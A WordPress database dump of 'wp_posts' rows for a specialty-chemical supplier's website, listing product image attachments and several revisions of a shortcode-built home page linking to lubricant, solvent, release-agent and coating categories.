INSERT INTO `wp_posts` VALUES (36, 1, '2016-08-15 19:29:24', '2016-08-15 19:29:24', '', 'dentalmachine', '', 'inherit', 'open', 'closed', '', 'dentalmachine', '', '', '2016-08-15 19:29:24', '2016-08-15 19:29:24', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/dentalmachine.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (37, 1, '2016-08-15 19:29:24', '2016-08-15 19:29:24', '', 'ear1', '', 'inherit', 'open', 'closed', '', 'ear1', '', '', '2016-08-15 19:29:24', '2016-08-15 19:29:24', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/ear1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (38, 1, '2016-08-15 19:29:25', '2016-08-15 19:29:25', '', 'ear2', '', 'inherit', 'open', 'closed', '', 'ear2', '', '', '2016-08-15 19:29:25', '2016-08-15 19:29:25', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/ear2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (39, 1, '2016-08-15 19:29:26', '2016-08-15 19:29:26', '', 'jar', '', 'inherit', 'open', 'closed', '', 'jar', '', '', '2016-08-15 19:29:26', '2016-08-15 19:29:26', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/jar.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (40, 1, '2016-08-15 19:29:27', '2016-08-15 19:29:27', '', 'Krytox_1', '', 'inherit', 'open', 'closed', '', 'krytox_1', '', '', '2016-08-15 19:29:27', '2016-08-15 19:29:27', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Krytox_1.png', 0, 'attachment', 'image/png', 0); 
INSERT INTO `wp_posts` VALUES (41, 1, '2016-08-15 19:29:28', '2016-08-15 19:29:28', '', 'Krytox1', '', 'inherit', 'open', 'closed', '', 'krytox1', '', '', '2016-08-15 19:29:28', '2016-08-15 19:29:28', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Krytox1.png', 0, 'attachment', 'image/png', 0); 
INSERT INTO `wp_posts` VALUES (42, 1, '2016-08-15 19:29:29', '2016-08-15 19:29:29', '', 'Krytox1_original', '', 'inherit', 'open', 'closed', '', 'krytox1_original', '', '', '2016-08-15 19:29:29', '2016-08-15 19:29:29', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Krytox1_original.png', 0, 'attachment', 'image/png', 0); 
INSERT INTO `wp_posts` VALUES (43, 1, '2016-08-15 19:29:30', '2016-08-15 19:29:30', '', 'lenses', '', 'inherit', 'open', 'closed', '', 'lenses', '', '', '2016-08-15 19:29:30', '2016-08-15 19:29:30', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/lenses.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (44, 1, '2016-08-15 19:29:31', '2016-08-15 19:29:31', '', 'logo', '', 'inherit', 'open', 'closed', '', 'logo-2', '', '', '2016-08-15 19:29:31', '2016-08-15 19:29:31', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/logo-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (46, 1, '2016-08-15 19:29:32', '2016-08-15 19:29:32', '', 'lubricants_page', '', 'inherit', 'open', 'closed', '', 'lubricants_page', '', '', '2016-08-15 19:29:32', '2016-08-15 19:29:32', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/lubricants_page.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (47, 1, '2016-08-15 19:29:33', '2016-08-15 19:29:33', '', 'medical', '', 'inherit', 'open', 'closed', '', 'medical-2', '', '', '2016-08-15 19:29:33', '2016-08-15 19:29:33', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/medical-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (48, 1, '2016-08-15 19:29:33', '2016-08-15 19:29:33', '', 'metal', '', 'inherit', 'open', 'closed', '', 'metal', '', '', '2016-08-15 19:29:33', '2016-08-15 19:29:33', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/metal.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (49, 1, '2016-08-15 19:29:34', '2016-08-15 19:29:34', '', 'milllube', '', 'inherit', 'open', 'closed', '', 'milllube', '', '', '2016-08-15 19:29:34', '2016-08-15 19:29:34', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/milllube.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (50, 1, '2016-08-15 19:29:35', '2016-08-15 19:29:35', 'Krytox Reseller', 'Krytox Reseller - Miller Stephneson', 'Krytox Reseller', 'inherit', 'open', 'closed', '', 'mslogo', '', '', '2016-09-26 12:19:54', '2016-09-26 12:19:54', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/mslogo-1.png', 0, 'attachment', 'image/png', 0); 
INSERT INTO `wp_posts` VALUES (51, 1, '2016-08-15 19:29:36', '2016-08-15 19:29:36', '', 'needle', '', 'inherit', 'open', 'closed', '', 'needle', '', '', '2016-08-15 19:29:36', '2016-08-15 19:29:36', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/needle.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (52, 1, '2016-08-15 19:29:36', '2016-08-15 19:29:36', '', 'pumps', '', 'inherit', 'open', 'closed', '', 'pumps', '', '', '2016-08-15 19:29:36', '2016-08-15 19:29:36', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/pumps.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (53, 1, '2016-08-15 19:29:37', '2016-08-15 19:29:37', '', 'sensor', '', 'inherit', 'open', 'closed', '', 'sensor', '', '', '2016-08-15 19:29:37', '2016-08-15 19:29:37', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/sensor.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (54, 1, '2016-08-15 19:29:38', '2016-08-15 19:29:38', '', 'singlehanded', '', 'inherit', 'open', 'closed', '', 'singlehanded', '', '', '2016-08-15 19:29:38', '2016-08-15 19:29:38', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/singlehanded.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (55, 1, '2016-08-15 19:29:39', '2016-08-15 19:29:39', '', 'slide1', '', 'inherit', 'open', 'closed', '', 'slide1', '', '', '2016-08-15 19:29:39', '2016-08-15 19:29:39', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/slide1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (56, 1, '2016-08-15 19:29:40', '2016-08-15 19:29:40', '', 'slide1_crop', '', 'inherit', 'open', 'closed', '', 'slide1_crop', '', '', '2016-08-15 19:29:40', '2016-08-15 19:29:40', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/slide1_crop.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (57, 1, '2016-08-15 19:29:44', '2016-08-15 19:29:44', '', 'slide1_original', '', 'inherit', 'open', 'closed', '', 'slide1_original', '', '', '2016-08-15 19:29:44', '2016-08-15 19:29:44', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/slide1_original.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (58, 1, '2016-08-15 19:29:46', '2016-08-15 19:29:46', '', 'slide1_v1', '', 'inherit', 'open', 'closed', '', 'slide1_v1', '', '', '2016-08-15 19:29:46', '2016-08-15 19:29:46', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/slide1_v1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (59, 1, '2016-08-15 19:29:47', '2016-08-15 19:29:47', '', 'solvents', '', 'inherit', 'open', 'closed', '', 'solvents', '', '', '2016-08-15 19:29:47', '2016-08-15 19:29:47', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/solvents-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (60, 1, '2016-08-15 19:29:48', '2016-08-15 19:29:48', '', 'spray', '', 'inherit', 'open', 'closed', '', 'spray', '', '', '2016-08-15 19:29:48', '2016-08-15 19:29:48', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/spray.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (61, 1, '2016-08-15 19:29:49', '2016-08-15 19:29:49', '', 'suit', '', 'inherit', 'open', 'closed', '', 'suit', '', '', '2016-08-15 19:29:49', '2016-08-15 19:29:49', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/suit.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (62, 1, '2016-08-15 19:29:50', '2016-08-15 19:29:50', '', 'tubs', '', 'inherit', 'open', 'closed', '', 'tubs', '', '', '2016-08-15 19:29:50', '2016-08-15 19:29:50', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/tubs.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (63, 1, '2016-08-15 19:29:51', '2016-08-15 19:29:51', '', 'woman', '', 'inherit', 'open', 'closed', '', 'woman', '', '', '2016-08-15 19:29:51', '2016-08-15 19:29:51', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/woman.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (64, 1, '2016-08-15 19:35:58', '2016-08-15 19:35:58', '[ux_banner_grid height="500" depth="3" depth_hover="3"]\r\n\r\n[col span="4"]\r\n\r\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\r\n\r\n[text_box width="40" width__sm="60" position_y="90"]\r\n\r\n[button text="ABOUT US" color="white" style="outline" size="xlarge" radius="62" link="https://www.miller-stephenson.com/about/"]\r\n\r\n[/text_box]\r\n[text_box]\r\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\r\n[/text_box]\r\n[text_box width="79" position_y="20"]\r\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\r\n\r\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="4"]\r\n\r\n[ux_banner height="259px" bg="86" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col span="2"]\r\n\r\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\r\n\r\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\r\n\r\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col]\r\n[col_grid span="9" height="1-4"]\r\n\r\n[ux_banner height="500px" bg="4144" bg_size="orginal" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\r\n\r\n[text_box width="21" position_x="100" position_y="0"]\r\n\r\n[button text="Industrial &amp; medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col_grid]\r\n[col_grid span="3" height="1-4"]\r\n\r\n[ux_banner height="500px" bg="1932" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\r\n\r\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\r\n\r\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n\r\n[/col_grid]\r\n\r\n[/ux_banner_grid]\r\n[row]\r\n\r\n[col span="3" align="0"]\r\n\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Custom Solutions</h3>\r\nCustom-built mold release agents, specialty coatings or unique formulations. Our engineering department can design a optimized solution for your application needs.\r\n\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0"]\r\n\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Application Experts</h3>\r\nWith over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.\r\n\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0"]\r\n\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Large Inventory</h3>\r\nOur fully stocked USA &amp; Canadian locations allow us to ensure swift delivery. Vast KRYTOX inventory of most grades at bulk pricing.\r\n\r\n[/featured_box]\r\n\r\n[/col]\r\n[col span="3" align="0"]\r\n\r\n[featured_box img="430" img_width="42" pos="left" icon_border="2" margin="px px px px"]\r\n<h3>Eco-Friendly</h3>\r\nIn response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.\r\n\r\n[/featured_box]\r\n\r\n[/col]\r\n[col]\r\n\r\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle" link="https://www.miller-stephenson.com/releasys-release-agent/"]\r\n\r\n[text_box width="47" width__sm="60" animate="rotateInUpLeft"]\r\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\r\n<h1><strong>ReleaSys™ </strong></h1>\r\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\r\n[button text="TELL ME MORE" color="white" style="outline" radius="82" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[gap height="5px"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="1614" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1618" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2205" image_size="Original"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1617"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2206"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1588"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1620"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="2243"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[row]\r\n\r\n[col span="3"]\r\n\r\n[ux_image id="2208"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1586"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1995"]\r\n\r\n[/col]\r\n[col span="3"]\r\n\r\n[ux_image id="1580"]\r\n\r\n[/col]\r\n\r\n[/row]\r\n[gap]\r\n\r\n&nbsp;', 'Home', '', 'publish', 'closed', 'closed', '', 'home', '', '', '2017-06-15 19:25:41', '2017-06-15 19:25:41', '', 0, 'https://132.148.10.86/wordpress/?page_id=64', 0, 'page', '', 0); 
INSERT INTO `wp_posts` VALUES (65, 1, '2016-08-15 19:35:58', '2016-08-15 19:35:58', '[row]\r\n\r\n[col span="1/1"]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 19:35:58', '2016-08-15 19:35:58', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (67, 1, '2016-08-15 19:41:54', '2016-08-15 19:41:54', '[row]\r\n\r\n[col span="1/1"]\r\n\r\n[ux_banner_grid]\r\n\r\n[ux_banner height="" text_color="" animated="" text_width="" text_align="" text_pos="" parallax="" parallax_text=""]\r\n\r\n<h3 class="alt-font"></h3> <p>___</p> <h1 class="animated fadeInLeft uppercase">SINCE 1955</h1> <h3 class="animated fadeInRight">Now 19$</h3> <p>___</p> <p></p><a class="button alt-button primary" title="" href="#">MORE</a>\r\n\r\n[/ux_banner]\r\n\r\n[/ux_banner_grid]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 19:41:54', '2016-08-15 19:41:54', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (68, 1, '2016-08-15 19:43:00', '2016-08-15 19:43:00', '[row]\r\n\r\n[col span="1/1"]\r\n\r\n[ux_banner_grid]\r\n\r\n[ux_banner text_color="light" text_width="60%" text_bg="<input autocomplete="off" name="value" style="width: 47px; height: 16px;">"]\r\n\r\n<h3 class="alt-font"></h3> <p>___</p> <h1 class="animated fadeInLeft uppercase">SINCE 1955</h1> <h3 class="animated fadeInRight">Now 19$</h3> <p>___</p> <p></p><p></p><a class="button alt-button primary" title="" href="#">MORE</a>\r\n\r\n[/ux_banner]\r\n\r\n[/ux_banner_grid]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 19:43:00', '2016-08-15 19:43:00', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (69, 1, '2016-08-15 19:45:27', '2016-08-15 19:45:27', '[row]\r\n\r\n[col span="1/1"]\r\n\r\n[ux_banner_grid height="600px" grid="11"]\r\n\r\n[ux_banner text_color="light" text_width="60%" text_bg=""]\r\n\r\n<h3 class="alt-font"></h3> <p>___</p> <h1 class="animated fadeInLeft uppercase">SINCE 1955</h1> <h3 class="animated fadeInRight">Now 19$</h3> <p>___</p> <p></p><p></p><p></p><a class="button alt-button primary" title="" href="#">MORE</a>\r\n\r\n[/ux_banner]\r\n\r\n[/ux_banner_grid]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 19:45:27', '2016-08-15 19:45:27', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (70, 1, '2016-08-15 19:47:25', '2016-08-15 19:47:25', '[row]\r\n\r\n[col span="1/1"]\r\n\r\n[ux_banner_grid height="600px" grid="11"]\r\n\r\n[ux_banner text_color="light" text_width="60%" text_bg="#001e49" bg="#001e49"]\r\n\r\n<h3 class="alt-font"></h3> <p>___</p> <h1 class="animated fadeInLeft uppercase">SINCE 1955</h1> <h3 class="animated fadeInRight">Now 19$</h3> <p>___</p> <p></p><p></p><p></p><p></p><a class="button alt-button primary" title="" href="#">MORE</a>\r\n\r\n[/ux_banner]\r\n\r\n[/ux_banner_grid]\r\n\r\n[/col]\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 19:47:25', '2016-08-15 19:47:25', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (72, 1, '2016-08-15 19:48:49', '2016-08-15 19:48:49', '[row]\r\n\r\n\r\n[ux_banner_grid height="400px" grid="11"]\r\n[col span="2/6"]\r\n\r\n[ux_banner text_color="light" text_width="60%" text_bg="#001e49" bg="#001e49"]\r\n\r\n<h3 class="alt-font"></h3> <p>___</p> <h1 class="animated fadeInLeft uppercase">SINCE 1955</h1> <h3 class="animated fadeInRight">Now 19$</h3> <p>___</p> <p></p><p></p><p></p><p></p><a class="button alt-button primary" title="" href="#">MORE</a>\r\n\r\n[/ux_banner]\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 19:48:49', '2016-08-15 19:48:49', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (73, 1, '2016-08-15 19:50:59', '2016-08-15 19:50:59', '[row]\r\n\r\n[ux_banner_grid height="400px" grid="11"]\r\n\r\n[col span="2/6"]\r\n\r\n[ux_banner text_color="light" text_width="60%" text_bg="#001e49" bg="#001e49"]\r\n<h3 class="alt-font"></h3> <p>___</p> <h1 class="animated fadeInLeft uppercase">SINCE 1955</h1> <h3 class="animated fadeInRight"></h3> <p>___</p> <p></p><p></p><p></p><p></p><a class="button alt-button primary" title="" href="#">MORE</a>\r\n[/ux_banner]\r\n\r\n[/col]\r\n\r\n[/ux_banner_grid]\r\n\r\n\r\n[/row]', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2016-08-15 19:50:59', '2016-08-15 19:50:59', '', 64, 'https://132.148.10.86/wordpress/2016/08/15/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (75, 1, '2016-08-15 21:40:04', '2016-08-15 21:40:04', '', 'Aerospace', '', 'inherit', 'open', 'closed', '', 'aerospace-2', '', '', '2016-08-15 21:40:04', '2016-08-15 21:40:04', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Aerospace-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (76, 1, '2016-08-15 21:40:11', '2016-08-15 21:40:11', '', 'Automotive', '', 'inherit', 'open', 'closed', '', 'automotive-2', '', '', '2016-08-15 21:40:11', '2016-08-15 21:40:11', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Automotive-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (77, 1, '2016-08-15 21:40:26', '2016-08-15 21:40:26', '', 'Bearings  (1)', '', 'inherit', 'open', 'closed', '', 'bearings-1-2', '', '', '2016-08-15 21:40:26', '2016-08-15 21:40:26', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Bearings-1-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (78, 1, '2016-08-15 21:40:53', '2016-08-15 21:40:53', '', 'Bearings  (5)', '', 'inherit', 'open', 'closed', '', 'bearings-5', '', '', '2016-08-15 21:40:53', '2016-08-15 21:40:53', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Bearings-5.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (79, 1, '2016-08-15 21:40:59', '2016-08-15 21:40:59', '', 'Conformal', '', 'inherit', 'open', 'closed', '', 'conformal-2', '', '', '2016-08-15 21:40:59', '2016-08-15 21:40:59', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Conformal-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (80, 1, '2016-08-15 21:41:26', '2016-08-15 21:41:26', '', 'Conformal_Epoxy', '', 'inherit', 'open', 'closed', '', 'conformal_epoxy-2', '', '', '2016-08-15 21:41:26', '2016-08-15 21:41:26', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Conformal_Epoxy-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (81, 1, '2016-08-15 21:41:52', '2016-08-15 21:41:52', '', 'CV joints', '', 'inherit', 'open', 'closed', '', 'cv-joints-2', '', '', '2016-08-15 21:41:52', '2016-08-15 21:41:52', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/CV-joints-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (82, 1, '2016-08-15 21:42:06', '2016-08-15 21:42:06', '', 'gasket', '', 'inherit', 'open', 'closed', '', 'gasket-2', '', '', '2016-08-15 21:42:06', '2016-08-15 21:42:06', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/gasket-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (83, 1, '2016-08-15 21:42:13', '2016-08-15 21:42:13', '', 'logo', '', 'inherit', 'open', 'closed', '', 'logo-3', '', '', '2016-08-15 21:42:13', '2016-08-15 21:42:13', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/logo-4.png', 0, 'attachment', 'image/png', 0); 
INSERT INTO `wp_posts` VALUES (84, 1, '2016-08-15 21:42:13', '2016-08-15 21:42:13', '', 'logo_ms', '', 'inherit', 'open', 'closed', '', 'logo_ms-2', '', '', '2016-08-15 21:42:13', '2016-08-15 21:42:13', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/logo_ms-1.png', 0, 'attachment', 'image/png', 0); 
INSERT INTO `wp_posts` VALUES (85, 1, '2016-08-15 21:42:15', '2016-08-15 21:42:15', '', 'MEdical', '', 'inherit', 'open', 'closed', '', 'medical-3', '', '', '2016-08-15 21:42:15', '2016-08-15 21:42:15', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/MEdical-1-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (86, 1, '2016-08-15 21:43:00', '2016-08-15 21:43:00', '', 'release agent', '', 'inherit', 'open', 'closed', '', 'release-agent', '', '', '2016-08-15 21:43:00', '2016-08-15 21:43:00', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/release-agent.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (87, 1, '2016-08-15 21:43:29', '2016-08-15 21:43:29', '', 'Releasys', '', 'inherit', 'open', 'closed', '', 'releasys', '', '', '2016-08-15 21:43:29', '2016-08-15 21:43:29', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Releasys.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (88, 1, '2016-08-15 21:43:36', '2016-08-15 21:43:36', '', 'Sp.Solvents', '', 'inherit', 'open', 'closed', '', 'sp-solvents-2', '', '', '2016-08-15 21:43:36', '2016-08-15 21:43:36', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Sp.Solvents-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (89, 1, '2016-08-15 21:43:39', '2016-08-15 21:43:39', '', 'Support', '', 'inherit', 'open', 'closed', '', 'support-2', '', '', '2016-08-15 21:43:39', '2016-08-15 21:43:39', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/Support-1.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (90, 1, '2016-08-15 21:43:48', '2016-08-15 21:43:48', '', 'VAZO (2)', '', 'inherit', 'open', 'closed', '', 'vazo-2-2', '', '', '2016-08-15 21:43:48', '2016-08-15 21:43:48', '', 0, 'https://132.148.10.86/wordpress/wp-content/uploads/2016/08/VAZO-2-2.jpg', 0, 'attachment', 'image/jpeg', 0); 
